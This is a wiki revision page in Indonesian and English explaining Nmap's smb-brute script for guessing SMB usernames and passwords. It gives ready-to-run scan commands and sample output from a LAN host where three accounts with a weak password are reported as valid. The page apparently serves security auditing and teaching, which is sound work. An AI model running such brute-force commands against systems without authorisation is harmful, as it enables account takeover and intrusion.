Difference between revisions of "Nmap: brute force hack smb password"
Onnowpurbo (talk | contribs) (New page: Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html ==File smb-brute== Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse ==User ...) |
Onnowpurbo (talk | contribs) |
||
Line 20: | Line 20: | ||
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> | sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> | ||
− | == | + | ==Contoh Output== |
+ | Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB | ||
+ | Nmap scan report for 192.168.0.7 | ||
+ | Host is up (0.0045s latency). | ||
+ | Not shown: 989 closed ports | ||
+ | PORT STATE SERVICE | ||
+ | 22/tcp open ssh | ||
+ | 80/tcp open http | ||
+ | 139/tcp open netbios-ssn | ||
+ | 443/tcp open https | ||
+ | 445/tcp open microsoft-ds | ||
+ | 873/tcp open rsync | ||
+ | 8873/tcp open dxspider | ||
+ | 9001/tcp open tor-orport | ||
+ | 9050/tcp open tor-socks | ||
+ | 9090/tcp open zeus-admin | ||
+ | 22939/tcp open unknown | ||
+ | MAC Address: 4C:E6:76:1F:15:4C (Buffalo) | ||
+ | |||
Host script results: | Host script results: | ||
− | | smb-brute: | + | | smb-brute: |
− | | | + | | derry:123456789 => Valid credentials |
− | | | + | | onno:123456789 => Valid credentials |
− | | | + | |_ reza:123456789 => Valid credentials |
− | + | ||
− | + | Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
==Referensi== | ==Referensi== | ||
* https://nmap.org/nsedoc/scripts/smb-brute.html | * https://nmap.org/nsedoc/scripts/smb-brute.html |
Revision as of 06:06, 11 February 2016
Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html
File smb-brute
Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse
User Summary
Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. Every attempt will be made to get a valid list of users and to verify each username before actually using them. When a username is discovered, besides being printed, it is also saved in the Nmap registry so other Nmap scripts can use it. That means that if you're going to run smb-brute.nse, you should run other smb scripts you want. This checks passwords in a case-insensitive way, determining case after a password is found, for Windows versions before Vista.
This script is specifically targeted towards security auditors or penetration testers. One example of its use, suggested by Brandon Enright, was hooking up smb-brute.nse to the database of usernames and passwords used by the Conficker worm (the password list can be found at http://www.skullsecurity.org/wiki/index.php/Passwords, among other places. Then, the network is scanned and all systems that would be infected by Conficker are discovered.
Example Usage
nmap --script smb-brute.nse -p445 <host> sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
Contoh Output
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB Nmap scan report for 192.168.0.7 Host is up (0.0045s latency). Not shown: 989 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 873/tcp open rsync 8873/tcp open dxspider 9001/tcp open tor-orport 9050/tcp open tor-socks 9090/tcp open zeus-admin 22939/tcp open unknown MAC Address: 4C:E6:76:1F:15:4C (Buffalo) Host script results: | smb-brute: | derry:123456789 => Valid credentials | onno:123456789 => Valid credentials |_ reza:123456789 => Valid credentials Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds